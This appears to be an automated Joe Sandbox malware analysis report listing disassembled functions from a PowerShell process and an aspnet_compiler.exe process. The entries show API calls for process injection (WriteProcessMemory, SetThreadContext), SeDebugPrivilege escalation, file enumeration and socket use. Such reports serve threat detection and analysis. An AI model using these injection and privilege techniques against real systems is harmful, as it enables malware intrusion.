Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: 60c3c92ae35afa49ca28d1792ee1fe382889505e05314d748c02af02320231b1
Instruction ID: 6628c431a9e60c84f9bf1c72db2b16ff89eedde89758e4252f243895029b1db7
Opcode Fuzzy Hash: 60c3c92ae35afa49ca28d1792ee1fe382889505e05314d748c02af02320231b1
Instruction Fuzzy Hash: BA516731F043059FDB649B78884076ABBE6AF85750F24846BD485CF282DE31C9C5CBA2

Function 06F122C3 Relevance: 6.4, Strings: 5, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 06F123FA
4']q, xrefs: 06F123EE
$]q, xrefs: 06F1239C
$]q, xrefs: 06F12390
$]q, xrefs: 06F12337

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: b4d21ab07e877766dc9525a897095deb28676e94a2519c0f7df62a2717da3de4
Instruction ID: 9e47b62c6932805ef056efe6bc24457465b12b3d65ee17ca84818d3662e5f425
Opcode Fuzzy Hash: b4d21ab07e877766dc9525a897095deb28676e94a2519c0f7df62a2717da3de4
Instruction Fuzzy Hash: 46412731F00205CFDB698EA9C44166ABBF5BF85690F2584AAD854CF251DB31CAC2CBA1

Function 06F103FD Relevance: 6.4, Strings: 5, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 06F1051B
$]q, xrefs: 06F10500
$]q, xrefs: 06F104F4
$]q, xrefs: 06F1049E
4']q, xrefs: 06F10527

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: 81283524d7c1719b9891de930838f92dd092432182f2d8aeaa8c2b37ebd0fe67
Instruction ID: f7313823292b1ac1c6316c076b9dfd3b1065755f020dd98904da8a26c1527410
Opcode Fuzzy Hash: 81283524d7c1719b9891de930838f92dd092432182f2d8aeaa8c2b37ebd0fe67
Instruction Fuzzy Hash: AB410632F102058FDBA84A39945127EB7D5BFA4790F20847AD842CF285DF35C9D1C7A2

Function 0080A53D Relevance: 5.3, APIs: 3, Instructions: 826
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_800000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e63ccb1763b987eba4e1332de5b9be7d4f63bf7e1c857770e710745b4da20da0
Instruction ID: 1ead7bc4f20fd7feeea78aac5272d7281d43a1a89966d63edc327be998570f6f
Opcode Fuzzy Hash: e63ccb1763b987eba4e1332de5b9be7d4f63bf7e1c857770e710745b4da20da0
Instruction Fuzzy Hash: 59F15A70A00319CFEB68CB25CC54B9AB7B6FF84304F1481A9E559EB291DB709E85CF52

Function 06F132F4 Relevance: 2.6, Strings: 2, Instructions: 131
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o]q, xrefs: 06F133BE
(o]q, xrefs: 06F133CE

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: (o]q$(o]q
API String ID: 0-1858875562
Opcode ID: 38f23a919de432bdd5a3b2f4a75296d51ecfed31da5bf7a10ba04eff5674da3d
Instruction ID: 12e03b1ba12630cab9cea2b27d6d9f068214a3d5ad0c31e7325ad90a79a5803d
Opcode Fuzzy Hash: 38f23a919de432bdd5a3b2f4a75296d51ecfed31da5bf7a10ba04eff5674da3d
Instruction Fuzzy Hash: AB412973F00209DFDF699F68C8457AEB7A2FB84750F14846AE5114F191CB32D892CB95

Function 06F1061B Relevance: 2.6, Strings: 2, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 06F106C3
4']q, xrefs: 06F106B7

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: d41620127c360af49f7fe9138e38d4f0b86c6b7fb6ddeae712021d496fd5e17a
Instruction ID: b6dbdb941da53f8ba780e2442ef0f94cc16ba863ce94c042a18a43eb6f3ad4aa
Opcode Fuzzy Hash: d41620127c360af49f7fe9138e38d4f0b86c6b7fb6ddeae712021d496fd5e17a
Instruction Fuzzy Hash: D931E736F0520ADFDB989E68C4506A6BBD1AFD6690B2484ABD045CF291DF31C8D1CB91

Function 06F13027 Relevance: 2.5, Strings: 2, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 06F13056
4']q, xrefs: 06F1304A

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: cd69f48b015f6830c83f8feef742ef570d00175175037daf75313c2092b0eecf
Instruction ID: 77d079f10a8f9645591f5f321c732c723bab0e61fef94e906de278398dbe515d
Opcode Fuzzy Hash: cd69f48b015f6830c83f8feef742ef570d00175175037daf75313c2092b0eecf
Instruction Fuzzy Hash: 5BE0D877F0824D8FDF589AAC90603E97BF17F81694F118496C4818B145C7214809C363

Function 00809414 Relevance: 1.7, APIs: 1, Instructions: 156
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,72B110FC,?), ref: 0080B204

Memory Dump Source

Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_800000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0079de03ef76f5a8f604ce5d29e153599b040c1381deef7f6e5428c86f359b25
Instruction ID: 538411d40e396beb00b849ba8b2b800bc3db428144b322a7948467d9dbe6564e
Opcode Fuzzy Hash: 0079de03ef76f5a8f604ce5d29e153599b040c1381deef7f6e5428c86f359b25
Instruction Fuzzy Hash: F251F4B19012199FDB64CF99C980BDDBBB5FF48314F1080AAE909B7250DB75AA88CF51

Function 00809438 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,18112514,00000000,?,?,?,00000000,00000000,?,0080AC7F,?,00000000,?), ref: 0080B4F4

Memory Dump Source

Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_800000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e723424495cae809ecbcb1196b236d9af3c4562d6c692c526ed42f7daad2492a
Instruction ID: 3247793e3bd769a82298cc5c199935bbcf304d8033709af9c299b9fe3ee405a0
Opcode Fuzzy Hash: e723424495cae809ecbcb1196b236d9af3c4562d6c692c526ed42f7daad2492a
Instruction Fuzzy Hash: 0A21F5B1910349DFDB50CF9AD984BDEBBF4FB48310F108429E918A7241D378AA44CBA5

Function 0080B470 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,18112514,00000000,?,?,?,00000000,00000000,?,0080AC7F,?,00000000,?), ref: 0080B4F4

Memory Dump Source

Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_800000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 735722d6c67e756fe20793096bc9e521334615db9ba28a63f38158711e7f5120
Instruction ID: 33976cd00dd6921cffc64b764345dd433a78432cc7aa3828a05bddf2e8fa79e8
Opcode Fuzzy Hash: 735722d6c67e756fe20793096bc9e521334615db9ba28a63f38158711e7f5120
Instruction Fuzzy Hash: F221D5B1D102499FDB50CF99D985BEEBBF4FB48310F10842AE518E7251D378AA44CB65

Function 0080B2F9 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0080AA33), ref: 0080B36B

Memory Dump Source

Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_800000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 41fcafd7c3bae466e612eb0772b6f181a4863fc8db911f6aa275e962553b38a6
Instruction ID: b5cc1321e2725799c1b5793dcfcc840c343baab6a660f15c1fcdc94ffb5c2f82
Opcode Fuzzy Hash: 41fcafd7c3bae466e612eb0772b6f181a4863fc8db911f6aa275e962553b38a6
Instruction Fuzzy Hash: 021126B2D102498FDB10CF9AD945BEEBBF4FB88320F258029E458A3750D3789945CFA1

Function 00809420 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0080AA33), ref: 0080B36B

Memory Dump Source

Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_800000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e6f0e4c5b2c5ad526c9367470156f982983ccde174ebb028008531dbfdf89187
Instruction ID: ea340601a4159652341c23c30be210b69be46d87ab9b09dd2a9ce9f8f9df9464
Opcode Fuzzy Hash: e6f0e4c5b2c5ad526c9367470156f982983ccde174ebb028008531dbfdf89187
Instruction Fuzzy Hash: 061114B2D1020A8FDB50CF9AC944BDEBBF4FB88320F258029E418A3740D378A545CFA5

Function 00809444 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,0080AA33), ref: 0080B36B

Memory Dump Source

Source File: 00000009.00000002.2324005608.0000000000800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_800000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d2ba28aef26e750a131e7c50b2e1c8df72dcdea615f355d83f86c4589b40e1c1
Instruction ID: 2353882d9e4570d73e9f04b3221bcd21f1c456de67087960149056aca2396daa
Opcode Fuzzy Hash: d2ba28aef26e750a131e7c50b2e1c8df72dcdea615f355d83f86c4589b40e1c1
Instruction Fuzzy Hash: 1B1114B2D102498FDB50CF9AC944BDEBBF4FB88320F258029E419A3740D378A545CFA5

Function 0075D005 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2323688236.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_75d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7dfb52da1cc19be0ffcdfb1b62e9ceaa99b9db21d25b716ca3ebb72db4cf65a
Instruction ID: 62b7ae5d77caa712e16d55712269084db76a8f52227904ff47a23705da6223d5
Opcode Fuzzy Hash: c7dfb52da1cc19be0ffcdfb1b62e9ceaa99b9db21d25b716ca3ebb72db4cf65a
Instruction Fuzzy Hash: 22016D6140D3C09FE7228B258C84692BFA4DF53225F0981DBEC888F1A3C2685C49C771

Function 0075D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2323688236.000000000075D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_75d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62d31d1e5e5f7119891e3dfc69dff55b8dbd9b84d94fa8157ba9e5cf780b94c6
Instruction ID: 6c44ec0fae0883e6eda2a8a71114310f25544b26f0e3dcfe2979983260719c16
Opcode Fuzzy Hash: 62d31d1e5e5f7119891e3dfc69dff55b8dbd9b84d94fa8157ba9e5cf780b94c6
Instruction Fuzzy Hash: 6001F2715043409AE7308A29CDC4BA7BF98DF41322F28C41AEC0C0A282C2BC9C4ACAB1

Function 06F10D28 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3477e4700d0d5d527290e4f20a8f0e6f4fdd4ab8c85cd4434aaacc5f331fa597
Instruction ID: d6c5e74b3a8e76ada01b9af6dca6b409ca475ff420993fc5c3d473eadec9bd06
Opcode Fuzzy Hash: 3477e4700d0d5d527290e4f20a8f0e6f4fdd4ab8c85cd4434aaacc5f331fa597
Instruction Fuzzy Hash: 23F022307403087BD6A066698806B2E38DAAF84B54F608018B509DF3D1CCB5EEC043AA

Function 06F109F7 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b85828724d0d2c98121caa9e3447ae19121c1d9d4af59e4f616ff643f28ab963
Instruction ID: 3de2af455eb1fbf5305a147220e1412a8931434a06625d6862a1e93d9ee193ec
Opcode Fuzzy Hash: b85828724d0d2c98121caa9e3447ae19121c1d9d4af59e4f616ff643f28ab963
Instruction Fuzzy Hash: FD01AF6050E3C69FC76797B488244A2BFB19F8724071D44CFD0C5CE1A3ED248986C3A2

Non-executed Functions

Function 06F11A10 Relevance: 19.2, Strings: 15, Instructions: 486COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F11CF9
$]q, xrefs: 06F11E91
4']q, xrefs: 06F11EBB
tP]q, xrefs: 06F11AAC
4']q, xrefs: 06F11EAF
$]q, xrefs: 06F11CED
4']q, xrefs: 06F11D23
4']q, xrefs: 06F11D17
4']q, xrefs: 06F11B7D
$]q, xrefs: 06F11CBF
$]q, xrefs: 06F11A60
4']q, xrefs: 06F11B89
tP]q, xrefs: 06F11AA0
$]q, xrefs: 06F11E57
$]q, xrefs: 06F11E85

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1742154110
Opcode ID: 1ed7e2b155820537d1f055d2ec98accc7c4ea58842e9af4511a3e57f52b65bc9
Instruction ID: d73ac09bd498da899ddd32c03e54d5c0e4cf15e19fa6546326cfd821e9cb8745
Opcode Fuzzy Hash: 1ed7e2b155820537d1f055d2ec98accc7c4ea58842e9af4511a3e57f52b65bc9
Instruction Fuzzy Hash: 85F14431F04349CFDB65CB6888447AABFF2EF85790F1480ABDA558F241DB318995C7A2

Function 06F124D8 Relevance: 6.3, Strings: 5, Instructions: 98COMMON

Download Yara Rule

Strings

4']q, xrefs: 06F12578
$]q, xrefs: 06F12547
4']q, xrefs: 06F1256C
$]q, xrefs: 06F12553
$]q, xrefs: 06F1252B

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: e34fc66794ce45c180f861f2df303ccd43bb8fa7928b6d274bf0e992d619ac11
Instruction ID: eaefeda77c52b8e85bdb25ba40c29a6a1dcc6674ad142c0d946f4f1574a151d5
Opcode Fuzzy Hash: e34fc66794ce45c180f861f2df303ccd43bb8fa7928b6d274bf0e992d619ac11
Instruction Fuzzy Hash: 1131F871F00209CFCB689BAD946066ABBE2ABC5650F14807BC545CF248EB31C6D1C791

Function 06F10B4B Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F10BBF
$]q, xrefs: 06F10BDB
$]q, xrefs: 06F10BF7
$]q, xrefs: 06F10C15

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: e0d206a2510e1d07b27665af10ff5e982a80b84a2e2914f4ff410b7ec745863e
Instruction ID: 082bfa15aa4d9f21db9d7e1759a53c3e7f94e3e4fdb4ba339a7dda839f3a2e8f
Opcode Fuzzy Hash: e0d206a2510e1d07b27665af10ff5e982a80b84a2e2914f4ff410b7ec745863e
Instruction Fuzzy Hash: 1E210232D04345DFEBA59E288840B66BBF0AF41690F1844ABD884CF242DF3185C4CBA2

Function 06F10083 Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

$]q, xrefs: 06F100CA
4']q, xrefs: 06F100EB
4']q, xrefs: 06F100F7
$]q, xrefs: 06F100D6

Memory Dump Source

Source File: 00000009.00000002.2381151785.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: d54d0c65af80d6a0c3496e2d2d39921f933d8948f6d8ee500ed481294025d046
Instruction ID: a134f4d29b287ab063707d5345ff4d1f021f0b4d9955a482acb480a485afd000
Opcode Fuzzy Hash: d54d0c65af80d6a0c3496e2d2d39921f933d8948f6d8ee500ed481294025d046
Instruction Fuzzy Hash: D4014F11B0D3864FC76B167D0C201556FB65F835A032A42DBD4D1DF2E7CE554D8583A7

Analysis Process: aspnet_compiler.exePID: 3092, Parent PID: 5536COMMON

Execution Graph

Execution Coverage:	31.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1847
Total number of Limit Nodes:	93

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\*, xrefs: 00403D99
Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 72e0338d38ad33957d38c9089103d94f386660c6381396b24b8f460aac80ca0e
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: f0b70a0fa2ce9f3aed2e2fb30e0a7af12988fdbd779b5d3696659e25893cc5c3
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: f0b70a0fa2ce9f3aed2e2fb30e0a7af12988fdbd779b5d3696659e25893cc5c3
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

